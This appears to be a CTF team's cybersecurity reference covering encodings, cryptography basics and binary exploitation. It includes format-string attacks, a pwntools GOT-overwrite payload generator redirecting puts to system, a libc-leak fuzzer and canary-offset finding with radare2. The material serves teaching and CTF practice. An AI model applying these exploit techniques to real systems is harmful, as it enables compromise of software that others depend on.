References

Welcome!

Hi! Thanks for visiting this page. This is our references gitbook, a collection of notes about many cyber security subjects. If you'd like us to add any more references, feel free to shoot us an email at thewinrars@gmail.com, or send us a DM on Twitter.

Crypto

Bases

A base is a number system that assigns characters to values. The most common numbering systems found in computer science are:

Base-2 (more commonly known as binary)
- Uses 0s and 1s to represent data
Base-10 (also known as denary)
- Uses the numbers 0-9 to represent data.
Base-16 (also known as hexadecimal)
- Uses 0-9 and the letters A-F to represent data.

There's also:

Base-8 (also known as octal)
- Uses the numbers 0-7
Base32
- Uses A-Z, 2-7 and =
Base 64
- Uses A-Z, a-z, 0-9, + and /, with = as padding
Base85
- Uses ASCII values 33-117

In normal, everyday use, we commonly use base 10 to represent numbers, as we don't often deal with large numbers on a day-to-day basis.

We can also represent values in different number systems, which can end up making some numbers look very odd to the untrained eye. For example:

255 in denary
FF in hexadecimal
1111 1111 in binary.

To show you all of these, I will now encode the message: {Hello! We are The WINRaRs} in Base 2, Base 8, Base 16, Base 32, Base 64, and Base 85.

Base 2

01111011 01001000 01100101 01101100 01101100 01101111 00100001 00100000 01010111 01100101 00100000 01100001 01110010 01100101 00100000 01010100 01101000 01100101 00100000 01010111 01001001 01001110 01010010 01100001 01010010 01110011 01111101

Base 8

173 110 145 154 154 157 41 40 127 145 40 141 162 145 40 124 150 145 40 127 111 116 122 141 122 163 175

Base 16

7b 48 65 6c 6c 6f 21 20 57 65 20 61 72 65 20 54 68 65 20 57 49 4e 52 61 52 73 7d

Base 32

PNEGK3DMN4QSAV3FEBQXEZJAKRUGKICXJFHFEYKSON6Q====

Base 64

e0hlbGxvISBXZSBhcmUgVGhlIFdJTlJhUnN9

Base 85

HUq^aCi:I>=(NL_Eb-@mBOr;f8PW/l;KI6

Notice how the encoded strings get shorter as we go along? That's because a larger base has more symbols available, so each character of the output carries more bits of the original data.

You can even try decoding these messages yourself here: https://gchq.github.io/CyberChef/#input=e0hlbGxvISBXZSBhcmUgVGhlIFdJTlJhUnN9
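If you'd rather reproduce the encodings locally, here is a minimal sketch using only Python's standard library. The variable names are ours, and base64.a85encode is the Ascii85 flavour of Base85 (other Base85 alphabets exist, so a different tool may print different characters).

```python
import base64

message = b"{Hello! We are The WINRaRs}"

# Per-byte representations: 8 binary digits, octal digits, 2 hex digits
as_binary = " ".join(f"{byte:08b}" for byte in message)
as_octal = " ".join(f"{byte:o}" for byte in message)
as_hex = " ".join(f"{byte:02x}" for byte in message)

# Encodings that pack several bytes into groups of characters
as_base32 = base64.b32encode(message).decode()
as_base64 = base64.b64encode(message).decode()
as_base85 = base64.a85encode(message).decode()  # Ascii85 variant

for name, encoded in [
    ("Base 2", as_binary),
    ("Base 8", as_octal),
    ("Base 16", as_hex),
    ("Base 32", as_base32),
    ("Base 64", as_base64),
    ("Base 85", as_base85),
]:
    print(f"{name:8} ({len(encoded):3} chars): {encoded}")
```

Printing the lengths side by side makes the "bigger base, shorter string" effect easy to see.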

Nonces

A nonce is a "number used once": a value, often random, that should never be repeated for a given key or session. The use of nonces means that an attacker can't just replay previous communications, as the replayed messages will not match the freshly chosen nonce and so will not be authenticated. In the SSL/TLS handshake, the client and server exchange nonces, which prevents replay attacks.

Nonces can also be used in encryption, for example in AES-GCM mode. In this case, it is very important that a nonce is never reused with the same key. The nonce makes it difficult for an attacker to gain information about the plaintext from a ciphertext, and makes sure the same plaintext does not get mapped to the same ciphertext every time. However, if a nonce is reused, an attacker can gain valuable information about two plaintexts from their two ciphertexts, even without knowing the nonce. In AES-GCM, if two plaintexts are encrypted with the same key and nonce, then the xor of the two ciphertexts is equal to the xor of the two plaintexts. The same is true when an IV is reused in OFB or CTR mode. The more ciphertexts encrypted with the same nonce, the more information an attacker can gain.
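To see why the xor relationship holds, here is a small sketch. It does not use AES: the keystream function below is a toy stand-in (SHA-256 over key, nonce and a counter) that we made up to mimic how CTR-style modes turn a key and nonce into a keystream. The point is only that the same key and nonce give the same keystream, which then cancels out.

```python
import hashlib
import os


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Toy CTR-style keystream (NOT AES): hash key || nonce || counter."""
    out = b""
    counter = 0
    while len(out) < length:
        block = hashlib.sha256(key + nonce + counter.to_bytes(8, "big")).digest()
        out += block
        counter += 1
    return out[:length]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt(key: bytes, nonce: bytes, plaintext: bytes) -> bytes:
    return xor(plaintext, keystream(key, nonce, len(plaintext)))


key = os.urandom(16)
nonce = os.urandom(12)

p1 = b"attack at dawn!!"
p2 = b"retreat at dusk!"
c1 = encrypt(key, nonce, p1)
c2 = encrypt(key, nonce, p2)  # same nonce reused: this is the mistake

# The keystream cancels out, leaving only the two plaintexts xored together
leak = xor(c1, c2)
print(leak == xor(p1, p2))

# An attacker who knows (or guesses) p1 recovers p2 without the key
recovered = xor(leak, p1)
print(recovered)
```

With a fresh nonce for the second message the keystreams differ, and the xor of the ciphertexts no longer reveals anything useful.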

RSA

please don't use rsactftool

RSA is a cryptosystem first proposed in 1977 by Ron Rivest, Adi Shamir, and Leonard Adleman, and is one of the most famous public-key cryptosystems.

It is used for 2 things:

Encrypting a message with a public key. This can then be decrypted with a private key.
Signing a message digitally. This allows the message to be verified and makes sure it hasn't been tampered with.

The core of RSA is that some things are very easy to do one way, and very challenging to do the other way. The example that RSA uses is multiplying prime numbers together. Take the two prime numbers 97 and 83. We can multiply these two numbers very easily using a calculator or pen and paper, giving 8051. However, if I were to give you the number 2059 and ask you to find the two primes which multiply to give it, that is much harder and takes a lot longer.

A function that is easy to compute but hard to reverse is called a 'one-way function'. When a secret piece of information (here, the prime factors) makes reversing it easy, it is called a 'trapdoor function', and such functions are used all over cryptography.
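As a rough illustration, here is textbook RSA with the tiny primes from the example above. The public exponent e = 5 and the message 1234 are arbitrary choices of ours, and there is no padding, so this is a toy for understanding only, not something to use for real encryption. It needs Python 3.8+ for pow(e, -1, phi).

```python
from math import gcd, isqrt

# Key generation with the two primes from the text
p, q = 97, 83
n = p * q                 # 8051, the public modulus
phi = (p - 1) * (q - 1)   # only computable if you know p and q

e = 5                     # public exponent (our choice), must be coprime to phi
assert gcd(e, phi) == 1
d = pow(e, -1, phi)       # private exponent: modular inverse of e

message = 1234            # must be smaller than n
ciphertext = pow(message, e, n)    # anyone can do this with (n, e)
decrypted = pow(ciphertext, d, n)  # only the holder of d can undo it
print(ciphertext, decrypted)


def factor(number: int) -> tuple:
    """Trial division: fine for toy numbers, hopeless for real key sizes."""
    for candidate in range(2, isqrt(number) + 1):
        if number % candidate == 0:
            return candidate, number // candidate
    raise ValueError("number is prime")


print(factor(2059))  # the 'hard direction' from the example
```

Trial division is instant here because the numbers are tiny. Real RSA moduli are hundreds of digits long, which is what makes the hard direction actually hard.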

Simple Ciphers

Ciphers are one of the earliest encryption methods, used to turn plaintext into something called ciphertext. The simplest example is the Caesar cipher, which shifts every letter of the message by a fixed number of places in the alphabet. It is named after Julius Caesar, who encrypted his messages with it, making them look like gibberish to the untrained eye while remaining very easy to decrypt. Anyway, enough of the Caesar cipher history lesson, let's move on to other ciphers.

A Vigenère cipher builds on the idea behind the Caesar cipher, except that a keyword is used, so each letter of the message is shifted by a different amount.

A Caesar cipher only has 25 useful keys (shifts of 1-25), since a shift of 26 leaves the message unchanged.

This makes the Vigenère cipher a lot harder to crack. These further advancements led to much stronger encryption, making messages harder to crack, because the number of possible keys grows with the length of the keyword.

This Vigenere cipher was also used in this .
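Both ciphers fit in a few lines of Python. This is a minimal sketch with function names of our own choosing; it works on the letters A-Z only, uppercases the input, and leaves every other character untouched.

```python
import string

ALPHABET = string.ascii_uppercase


def caesar(text: str, shift: int) -> str:
    """Shift every letter by the same amount (negative shift decrypts)."""
    result = []
    for ch in text.upper():
        if ch in ALPHABET:
            result.append(ALPHABET[(ALPHABET.index(ch) + shift) % 26])
        else:
            result.append(ch)  # leave spaces, digits, punctuation alone
    return "".join(result)


def vigenere(text: str, key: str, decrypt: bool = False) -> str:
    """Shift each letter by the matching letter of the repeating keyword."""
    shifts = [ALPHABET.index(k) for k in key.upper()]
    result = []
    used = 0  # how many key letters have been consumed so far
    for ch in text.upper():
        if ch in ALPHABET:
            shift = shifts[used % len(shifts)]
            if decrypt:
                shift = -shift
            result.append(ALPHABET[(ALPHABET.index(ch) + shift) % 26])
            used += 1
        else:
            result.append(ch)
    return "".join(result)


print(caesar("HELLO", 3))
print(vigenere("ATTACKATDAWN", "LEMON"))
```

Note that a Vigenère cipher with a one-letter key is just a Caesar cipher, which is a handy sanity check.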

Pwn

Canary

not the bird!

Canary

A canary is a random value placed on the stack to detect buffer overflow attacks. Before a function returns, the value is compared to the original random value. If they are different, then a buffer overflow has taken place and the program crashes. There are two main ways to bypass canaries: using a format string vulnerability (if one exists) or brute-forcing the value (which is not feasible on 64-bit machines).

Canary and Format String

Format string vulnerabilities allow us to leak arbitrary values off the stack. Since the canary is (by definition) on the stack, this allows us to read the value. The key to finding which item on the stack is the canary, if you cannot be bothered to look at the disassembly, is to iterate through every offset several times. Canary values always end in 00 and are different every time, so they are fairly distinguishable. We advise turning ASLR off when testing for canaries to eliminate false positives (as ASLR randomises libc addresses every time the program is run).

The way stack canaries work is as follows: at the beginning of the function, a random value is moved into a local variable:

mov rax, qword fs:[0x28]
mov qword [var_8h], rax

At the end of the function, the value in this local variable (var_8h) is checked against the random value at qword fs:[0x28], and if they are different the program crashes:

mov rax, qword [var_8h]
xor rax, qword fs:[0x28]
je [leave]
call sym.imp.__stack_chk_fail ; void __stack_chk_fail(void)
leave

var_8h is once again moved into rax, which is then compared (via xor) with the original random value. If they are equal, the program jumps to the leave instruction. If not, it calls __stack_chk_fail.

So, knowing the value through a format string leak, we want to find the offset between the beginning of our input buffer and the canary on the stack. Luckily we can use an RE tool to do this as the rax register is involved, and our preferred tool of choice is radare2. Firstly, generate a De Bruijn pattern using ragg2:

ragg2 -P 100 -r
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAh

Then run the program in debug mode, input the sequence and set a breakpoint right after rax reads the variable value:

r2 -d vuln
> aaa
> db 0x00400945
> dc

We then use wopO to work out the offset using the De Bruijn pattern.

> wopO dr eip

And this gives us the offset between the buffer and the canary.
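If you're curious what a De Bruijn pattern and an offset lookup do under the hood, here is a pure-Python sketch of the idea. It is not radare2's implementation: the alphabet (A-Z, a-z, 0-9) and the subsequence length of 3 are assumptions we picked so that the output starts the same way as the pattern above, and the "leaked" bytes are hypothetical. It also ignores endianness, which a real register dump would force you to think about.

```python
import string


def de_bruijn(alphabet: str, n: int) -> str:
    """Standard De Bruijn sequence: every n-character chunk appears once."""
    k = len(alphabet)
    a = [0] * (k * n)
    sequence = []

    def db(t: int, p: int) -> None:
        if t > n:
            if n % p == 0:
                sequence.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in sequence)


ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits
pattern = de_bruijn(ALPHABET, 3)[:100]
print(pattern)


def pattern_offset(pattern: str, chunk: str) -> int:
    """Where in the pattern did the observed chunk come from? (-1 if absent)"""
    return pattern.find(chunk)


# Hypothetical: pretend the debugger showed these 8 characters at the canary
observed = pattern[72:80]
print(pattern_offset(pattern, observed))
```

Because every 3-character chunk is unique, any slice of the pattern that ends up in a register or on the stack pins down exactly how far into the input it was.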

Format String Attack

5.4 moment

A format string vulnerability is caused when printf, sprintf, or other functions that use formatting are called directly on user input.

For example,

char input[20];
fgets(input, 20, stdin);
printf(input);        // This is horrible coding practice!
printf("%s", input);  // This is good coding practice!

What is string formatting?

String formatting allows you to put integer values, character values, pointer values, string values and much more within a string to be printed, scanned to a file, scanned to a variable, and much more.

Specifier   Purpose
%d          Decimal number
%p          Hexadecimal pointer. Reads 4 bytes on 32-bit and 8 bytes on 64-bit
%x          Hexadecimal integer. (Reads 4 bytes on most systems)
%s          Read data as a pointer to a string
%n          Take the value as an address. Write the number of characters previously printed to this address.

So, why does this matter? How is it vulnerable? To understand this, we must think about how the CPU knows where to get arguments. On a 32-bit system, arguments are commonly placed on the stack. First argument on the top, second argument is the next value down, etc.

On 64-bit systems, the first six arguments are passed in the registers RDI, RSI, RDX, RCX, R8, and R9. If there are any more arguments, they are stored on the stack. Now think. How does the CPU know a value on the stack was supposed to be an argument and isn't just a random value? Spoiler: it doesn't. Thus, if our input is printed directly, e.g. printf(input), we get a vulnerability.

As its first argument, printf expects a format string. This means we can use format specifiers to read values off of the stack. To explain further: imagine we type %x into our input on a 32-bit binary. The binary then calls printf(input);. Given the %x, it will take what it believes is the next argument off of the stack and print it back. In reality, it's just the first value on the stack.

Thus, we get the ability to read values off the stack. This can be incredibly useful in order to leak things like the binary base, libc base, or canary in order to bypass PIE, ASLR and canaries respectively. We can leak instruction pointers, libc symbols, and much more.

As well as a read vulnerability, we get an arbitrary write with format strings. Remember %n? It takes the argument as an address, and then writes the number of characters previously written to that address.

In order to make use of this, we must think of some special things we can do to format specifiers. %<number><specifier> pads the output of the specifier to be a specific number of characters, whilst %<number>$<specifier> goes to the numberth argument (1st argument if number is 1, 2nd argument if number is 2, etc.) and uses that specifier on it. So, we can use something like %<number>c to make sure printf prints the number of characters we want before %n.

The problem is, we need the address to be stored somewhere on the stack for this to work. If your input's on the heap, you aren't in luck. But if we've got something like this:

char input[20];
fgets(input,20,stdin);
printf(input);

Our input will be on the stack! All we have to do is find out how far our input is along the stack, and we can use it. Remember: we can use %<number>$ to jump to a certain value on the stack. With this same logic, we can arbitrarily read values from memory using %s, as %s will read the value on the stack as a pointer to a string and print said string.
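To make the padding arithmetic concrete, here is a sketch that builds only the format-specifier part of a write, one byte at a time with %hhn (the one-byte variant of %n). It assumes the target addresses already sit at consecutive argument positions starting at first_index, which you would still have to arrange yourself. The function names, the index 10 and the value 0x401136 are all made up for illustration. Mixing plain %<number>c with positional %<number>$hhn is the style commonly seen in CTF payloads and relies on glibc tolerating it.

```python
import re


def build_hhn_format(first_index: int, value_bytes: bytes) -> str:
    """Emit %<pad>c%<index>$hhn pairs so each %hhn stores the wanted byte."""
    parts = []
    printed = 0  # characters printf will have output so far
    for i, wanted in enumerate(value_bytes):
        # %hhn stores (printed mod 256), so pad up to the next matching count
        pad = (wanted - printed) % 256
        if pad:
            parts.append(f"%{pad}c")
            printed += pad
        parts.append(f"%{first_index + i}$hhn")
    return "".join(parts)


def simulate(fmt: str) -> dict:
    """Replay the format string and record what each %hhn would store."""
    written = {}
    printed = 0
    for pad, index in re.findall(r"%(\d+)c|%(\d+)\$hhn", fmt):
        if pad:
            printed += int(pad)
        else:
            written[int(index)] = printed % 256
    return written


value = (0x401136).to_bytes(3, "little")  # hypothetical value to write
fmt = build_hhn_format(10, value)
print(fmt)
print(simulate(fmt))
```

Writing byte by byte keeps the padding below 256 characters per write, instead of asking printf to print millions of characters for a single %n.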

Creating format string payloads can be tedious manually, especially if they need to be dynamic, or overwrite multiple values. With pwntools, we can use a few special things. First of all, let's look at the FmtStr object type.

With the FmtStr object type, we can dynamically calculate how far our input is along the stack. Take this example:

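from pwn import *

e = ELF("./sample_elf")

def write_fmt(data):
    # Start a fresh process for every payload so attempts don't interfere
    p = e.process()
    p.recvline()       # Discard the first line of output
    p.sendline(data)   # Send the format string
    output = p.recv()  # Capture what printf produced
    p.close()
    return output

# FmtStr calls write_fmt repeatedly to find the offset of our input
obj = FmtStr(execute_fmt=write_fmt)
...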

The above code generates a pwntools FmtStr object. The FmtStr object takes a function as an argument, which it uses to execute a format string and get the output. With this, it automatically calculates the offset of the input on the stack via leaks and cyclic patterns. Now, let's look at generating payloads.

from pwn import *

e = ELF("./sample_elf")

def write_fmt(data):
    p = e.process()
    p.recvline()
    p.sendline(data)
    output = p.recv()
    p.close()
    return output

obj = FmtStr(execute_fmt=write_fmt)
# Here we supply a dictionary of form {address: value to write}.
# In this case, we're executing a GOT overwrite,
# overwriting puts@got with system@plt.
writes = {e.got['puts']: e.plt['system']}
payload = fmtstr.fmtstr_payload(obj.offset, writes)

The above code gets the offset attribute of the FmtStr object, containing the offset of the input on the stack. It then uses the pwntools function fmtstr_payload to generate a payload given a dictionary of writes and an input offset. There's a lot more to format string attacks using pwntools. You can read about it here: https://docs.pwntools.com/en/stable/fmtstr.html

Fuzzer

Here's a quick fuzzer I wrote for format string challenges. The idea is to leak pointers at various offsets, and see if any of them are a libc symbol (won't catch offsets such as read+14):

from pwn import *

context.arch = "amd64"  # Change as applicable
e = ELF("./format")     # Binary name
p = process(e.path)
libc = p.libc           # Load libc, initialised with correct values
# Flip the sym:addr dict so symbols can be looked up by address
rev = {value: key for (key, value) in libc.sym.items()}

def exec_fmt(pl):
    p.sendline(pl)
    return p.clean()

# Assumes process loops forever; you'll need to spawn a new process
# in this loop if you only get a few leaks
for x in range(1, 100):
    # Leak pointer at offset
    leak = exec_fmt(f"%{x}$p".encode()).strip()
    try:
        leak = int(leak, 16)
        # Print matching symbol if found
        print(f"%{x}$p : {hex(leak)} - {rev[leak]}")
    except (ValueError, KeyError):
        # Not a hex value, or not the address of a known symbol
        pass

python3 fuzz.py SILENT=1
-----------------------------------------
%21$p : 0x7ffff7f9a5c0 - _IO_2_1_stderr_
%25$p : 0x7ffff7f9a5c0 - _IO_2_1_stderr_
%28$p : 0x7ffff7f9b4a0 - _IO_file_jumps
%30$p : 0x7ffff7f9a5c0 - _IO_2_1_stderr_

NX, PIE, RELRO and ASLR

Whilst stack canaries mainly exist to defend against stack overflow, NX, PIE, RELRO and ASLR fight against many attacks.

NX - No-execute. It means that pages like the stack and the heap are made unexecutable, and the pages that must be executable are made unwritable.

PIE - Position Independent Executable. (Please note this isn't just a protection, sometimes it is required for shared libraries and such). It means that the binary base of the application is different each run, so code within the binary like gadgets, or the PLT and the GOT and such are not in a constant location.

RELRO - Relocation Read-only. Partial RELRO means that the GOT is relocated to a place which we will not be able to reach via overflow. Full RELRO means the GOT is relocated, and read only, preventing GOT overwrite attacks.

ASLR - Unlike other protections, this one lives in the kernel, not a binary. There's no compiler option to enable or disable this. ASLR is much like PIE, but for imported things and other pages of the memory like libraries and the stack, randomising their base offset.

NX

One of the simplest buffer overflow attacks targets the stack: the return address is overwritten with the address of shellcode, and the shellcode (sometimes with a NOP sled) spawns a shell. NX defends against this, making the stack, heap and other places in memory non-executable. Generally, it's very hard to bypass this. However, it is possible using a function called mprotect, which allows you to change the protections of certain areas in memory. Under specific circumstances, such as being able to control pages or knowing the address of the stack, an attacker could use mprotect to make the stack executable again, and then execute a classic buffer overflow attack.

PIE

By itself, PIE isn't too large of a problem. When combined with other things, however, it gets very annoying. For example, one solution to the NX problem is to use something called ROP (return oriented programming), or its cousin JOP (jump oriented programming). These involve creating chains of "gadgets": addresses of pieces of code inside the binary that can be used to carry out specific tasks, like controlling registers or executing system calls. With PIE, this becomes much harder, as the addresses of these gadgets will not be static.

Another technique that PIE mitigates is ret2libc. This is where an attacker uses functions inside of the standard C library to create a shell. With ASLR (which will be explained shortly), this can be quite difficult. However, given a buffer overflow, things inside the binary like the PLT and the GOT can be used to leak the libc base, giving an attacker the power to perform ret2libc. PIE means that the PLT and GOT won't be static.

So, how can we bypass this? One way is a format string attack. If the binary is vulnerable to a format string attack, we can leak addresses in the binary. If we leak an address in the binary, we can subtract a specific offset from it to leak the binary base. Say there's a global variable, var1. This variable var1 is stored inside of the binary at the offset 0x567. On the stack is the address of var1. If we leak the address of var1, we can subtract 0x567 to get the binary base.

Other possibilities include the ability to brute force values like the RIP/EIP byte by byte due to forking and variable length inputs. More on this later.

Generally, however, we leak the binary base by leaking the address of something in the binary, then subtracting the needed offset.
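The subtraction itself is a one-liner. Here is a sketch using the var1 example, where the leaked address is a made-up value standing in for what a %p leak might print:

```python
VAR1_OFFSET = 0x567  # offset of var1 inside the binary, from the example

# Hypothetical output of a %p leak that happens to point at var1
leaked_text = b"0x55d0c1a2e567"
leaked_var1 = int(leaked_text, 16)

binary_base = leaked_var1 - VAR1_OFFSET
print(hex(binary_base))

# Sanity check: a load base should sit on a page boundary
assert binary_base % 0x1000 == 0


def rebase(offset: int) -> int:
    """Turn an offset inside the binary into a runtime address."""
    return binary_base + offset


print(hex(rebase(0x1234)))  # 0x1234 is an arbitrary example offset
```

If the page-alignment check fails, the leaked value almost certainly wasn't the symbol you assumed it was.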

RELRO

In some rare cases, a buffer overflow in a global variable can allow an attacker to overflow into and overwrite the GOT. Partial RELRO relocates the GOT to a place that cannot be reached via overflow, and makes certain parts of it read-only. However, this still leaves the avenue open for a GOT overwrite through other kinds of write. Full RELRO completely mitigates GOT attacks by making the entire GOT read-only after resolution. This is almost unbypassable, however it is still vulnerable to the mprotect attack I mentioned earlier in the context of NX.

ASLR

ASLR randomises the position of many places in memory, like libraries and the stack. This helps to prevent attacks like ret2libc, which rely on knowing the exact location of things inside of the libc. The libc base or stack address can be leaked via a format string attack, similar to PIE. We can also use the PLT and the GOT to leak the addresses of certain functions in the libc.

Remember, after a dynamic function has been called once through the PLT, it is resolved so that its GOT entry holds the actual address. Any form of arbitrary read will allow us to read the GOT and get the address of one of the libc functions. With the address of a libc function, all that is required is to subtract its offset within the libc to get the libc base, defeating ASLR.

An example is using the PLT. We can call upon the PLT entry of a function to emulate the actual function. For example, say puts has been called before. We can call upon puts@plt, using puts@got as an argument. The program would then print the value of puts@got (the address of puts in the libc!) as a string, giving us the ability to calculate the libc base and defeat ASLR.

Generally, ASLR is defeated if you can accurately get the address of something inside of libc, like a variable or a function.
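When the leak comes out of puts, it arrives as raw bytes rather than readable hex, so it has to be unpacked first. Here is a standard-library sketch of that step. The offset of puts and the leaked bytes are hypothetical values chosen for illustration. In a real exploit the offset comes from the target's libc, and pwntools' u64() does the same unpacking.

```python
def unpack_leak(raw: bytes) -> int:
    """puts stops at the first null byte, so pad back up to 8 bytes."""
    return int.from_bytes(raw.ljust(8, b"\x00"), "little")


PUTS_OFFSET = 0x80E50  # hypothetical offset of puts inside libc

# Hypothetical line printed by puts(puts@got): 6 address bytes + newline
raw_line = bytes.fromhex("505ee5f7ff7f") + b"\n"

puts_address = unpack_leak(raw_line.rstrip(b"\n"))
libc_base = puts_address - PUTS_OFFSET

print(hex(puts_address))
print(hex(libc_base))

# Same sanity check as for PIE: the base should be page-aligned
assert libc_base % 0x1000 == 0
```

One caveat: if an address byte happens to be a null or a newline, the leak will come back truncated, and it is usually easiest to just run the exploit again.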

ASLR is a kernel protection. Whether or not ASLR is on is determined by the system and not the binary. You can control it with echo <0,1,2> | sudo tee /proc/sys/kernel/randomize_va_space. 0 means ASLR is off, 1 means partial, 2 means full.

pwntools

pwntools is an incredibly powerful python library which greatly simplifies your life when it comes to binary exploitation. It provides a much simpler interface with the program, includes a host of in-built functions for common operations and allows smooth transitioning between local and remote exploits.

Setting it all up

Importing pwntools

Unlike most Python packages, with pwntools we generally import everything and don't bother about efficiency.

from pwn import *

The ELF class

The ELF class is the class you will be using most often for your Linux exploits; it allows you to instantiate an object that directly handles the executable itself.

e = ELF("./executable")

Processes

When we want to interface with a running executable we use a process. Processes can either be made by themselves or be linked to a specific ELF object (useful if you also want to work with the executable's ELF object, such as its symbols, alongside the process).

p = process("/bin/sh")
p = elf.process()			# elf is an ELF object

You can also create a remote process to interface with executables on a network:

p = remote("host.hosty.net", 31337)	# takes in a host and a port

Communicating with the Executable

Note: In these examples, p is a process object.

p.sendline(text)

Sends the text to the executable, followed by a newline. This is generally the main way you respond to input prompts and deliver payloads.

p.recvline()

Quite literally what it sounds like. Receives data until the next newline character (\n). Returns the data read (as bytes) in case you want to print it.

Note: Calling this the wrong number of times can make your exploit seem to fail when it is actually just waiting for more output. This should be the first thing you check if everything else seems to make sense.

p.clean()

Receives and returns all data that is currently waiting to be read, emptying the buffer. Make sure there isn't an error here before you move on to other sections of your exploit.

p.recvuntil(string)

Receives all data until it encounters the string argument, after which it stops receiving.

Packing Integers

pwntools makes packing integers easy. While you would normally use the struct module and the struct.pack() function, those functions have a host of options that we simply do not need, and it is hard to remember which arguments are needed in which case. This is where pwntools comes in.

p32(integer)

p32() takes in an integer and returns the representation of that integer as a series of bytes, much like struct.pack(). p32(0xdeadc0de) == b"\xde\xc0\xad\xde"

u32(bytes)

u32() does quite the opposite - takes in a series of bytes and returns the integer representation of them, much like struct.unpack(). u32(b"\xde\xc0\xad\xde") == 0xdeadc0de

p64() and u64()

These have the same function as p32() and u32() but are for 64-bit binaries.
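For comparison, here is roughly what these helpers look like when written with the struct module directly. The pack32/unpack32/pack64/unpack64 names are ours, and little-endian is assumed throughout (pwntools follows whatever context.endian is set to).

```python
import struct


def pack32(value: int) -> bytes:
    return struct.pack("<I", value)       # "<" little-endian, "I" 4 bytes


def unpack32(data: bytes) -> int:
    return struct.unpack("<I", data)[0]   # unpack always returns a tuple


def pack64(value: int) -> bytes:
    return struct.pack("<Q", value)       # "Q" is an 8-byte unsigned integer


def unpack64(data: bytes) -> int:
    return struct.unpack("<Q", data)[0]


print(pack32(0xdeadc0de))
print(hex(unpack32(b"\xde\xc0\xad\xde")))
print(pack64(0xdeadc0de))
```

The format characters and the single-element tuple from unpack are exactly the details that are easy to forget mid-CTF, which is why p32() and friends are so convenient.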

Logging

log.info(text)

Prints text to the screen in a special format to note that it's a log. Useful for distinguishing between text produced by the program and your own debugging. There are other functions for various levels of warning.

Context

Context allows you to set some defaults to prevent you from having to repeat yourself. For example, context.endian = 'little' makes all future p32() and u32() functions (as well as other similar ones) use little endian, meaning you don't have to specify every time you use the function.

The GOT and the PLT

There are many functions in C. Examples include fgets, system, fopen, dup, dup2, etc. All or many of these functions are included in the C standard library, which we call libc.

Libc is essentially a shared object file that stores all sorts of variables and functions a binary will need. Almost every binary imports this library at some address, and this address is usually different on every execution due to ASLR.

Note: not all binaries need libc. Some don't use libc functions at all, some are static and carry all of the libc functions they need along with them.

Note 2: We're talking about libc here, but this applies to all dynamic libraries.

The problem arises: how can the binary know where the function it needs is located if the address at which libc is imported is constantly changing? That's where the GOT and the PLT come in.

GOT stands for Global Offset Table. It is a section existing in the binary that holds the real addresses of functions that are in dynamic libraries. For example, printf@got holds the address of printf.

PLT stands for Procedure Linkage Table. It holds PLT "stubs": small pieces of code whose purpose is to jump to the correct function, or set things up.

When dealing with dynamic functions, the program will call upon stubs in the PLT, not the functions directly.

At the beginning of the program, the GOT may hold the addresses of the PLT instead of the actual addresses, or it may hold the addresses of resolution or identifier functions.

The first time a dynamically linked function is run, the PLT will be jumped to. The PLT will fall into its "default" behaviour: resolving the address of the actual function, updating the GOT to hold this address, then jumping to the function.

Afterwards, anytime the PLT is called again, it will simply read the GOT to get the address of the function, then jump there.

If full RELRO is not on, the GOT is not read-only. This can lead to a GOT overwrite attack, in which we overwrite the GOT entry of a function with another address. Say, for example, puts is called on our input after a vulnerability that gave us an arbitrary write. We would be able to overwrite puts in the GOT with the address of system in the PLT perhaps, then input /bin/sh.

When puts@plt would run, it would check puts@got, which would hold the address of system, and then jump there, allowing us to control the program's execution.
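The whole dance can be modelled in a few lines of Python. This is only a toy: dictionaries stand in for the GOT and for libc, the function names are ours, and the overwrite points puts straight at the stand-in system function rather than at system@plt, which is a simplification of the attack described above.

```python
calls = []        # record of which "libc" function really ran
resolutions = []  # record of every time the resolver had to do work


def real_puts(arg):
    calls.append(("puts", arg))


def real_system(arg):
    calls.append(("system", arg))


LIBC = {"puts": real_puts, "system": real_system}  # stand-in for libc
GOT = {"puts": None, "system": None}               # None = not resolved yet


def resolve(name):
    """Stand-in for the dynamic linker: look the function up, fill the GOT."""
    resolutions.append(name)
    GOT[name] = LIBC[name]


def plt(name, arg):
    """PLT stub: resolve on first use, afterwards just jump via the GOT."""
    if GOT[name] is None:
        resolve(name)
    return GOT[name](arg)


plt("puts", "hello")  # first call: resolver runs, GOT entry gets filled
plt("puts", "again")  # second call: goes straight through the GOT

GOT["puts"] = LIBC["system"]  # the attacker's arbitrary write
plt("puts", "/bin/sh")        # the program thinks it is calling puts...

print(resolutions)
print(calls)
```

The stub never checks what the GOT entry points to, it just jumps there. Full RELRO closes this off by making the table read-only.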

Reverse Engineering

Assembly

There's a lot to learn here - it's a whole new language! I've devoted a whole page to learning assembly here, but if you want a quick overview of the information that you need in CTFs, here it is:

Registers:

Registers are small, very fast storage locations inside the CPU. They hold the data (and the addresses of instructions) that the program is currently working with. The data is stored here, rather than in RAM, as it's quicker for the CPU to access. The instructions inside a program move data in and out of the different registers. They come in different sizes:

We also have different registers for different purposes. These are:

We also have some other registers that are very important to note:

We'll dig into what these registers do in the page about assembly, found here (also at the top of the assembly portion of the page)

Syntax

Assembly comes in two different flavours, or rather, two different syntaxes. One syntax is Intel, the other being AT&T. You do have to note which syntax you're analysing, as it can become quite frustrating moving from Intel to AT&T and vice-versa.

Intel:

This is the syntax that you're most likely to see in CTFs, so it's good to get to know how Intel syntax is displayed.

mov eax, 0

This is Intel syntax. It puts the instruction first (e.g. mov), then the destination that the data will be going to, then the source that the data will come from.

The instruction here is mov, the destination here is eax, and the source is 0. This instruction is saying "move the constant 0 into the eax register".

AT&T:

This syntax is seen less often in CTFs, but it still appears sometimes.

This is AT&T syntax. Notice the difference?

We have the destination and the source swapped around so that it's the other way! Whyyyyyyy... who knows. The Intel command that we just showed, in AT&T syntax, is

movl $0, %eax

So here we've got a tiny bit more to dissect. AT&T uses movl as the instruction (as opposed to mov), then has the source as $0 (this being the constant 0), then the destination as %eax. The $ sign means that a value is a constant, and the % means that the value is a register. Fortunately, a disassembler sticks to one syntax throughout its output, so lucky us for not having to convert each time!

